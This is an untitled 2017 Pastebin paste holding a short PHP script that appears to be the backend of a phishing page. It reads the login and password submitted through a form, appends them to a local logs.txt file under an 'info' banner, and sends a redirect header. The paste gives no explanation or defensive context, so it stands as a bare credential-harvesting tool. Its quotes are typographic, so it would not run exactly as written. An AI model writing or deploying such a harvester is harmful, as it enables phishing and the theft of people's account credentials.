Advertisement
Guest User

Untitled

a guest
Jun 5th, 2017
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. <?php
  2. header(‘Location: “”‘);
  3. $user=$_POST['login'];
  4. $password=$_POST['password'];
  5. $guarda=fopen(“logs.txt”,a);
  6. fwrite($guarda,”
  7. *******info********
  8. User: “.$user.”
  9. Password: “.$password);
  10. fclose($guarda);
  11. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement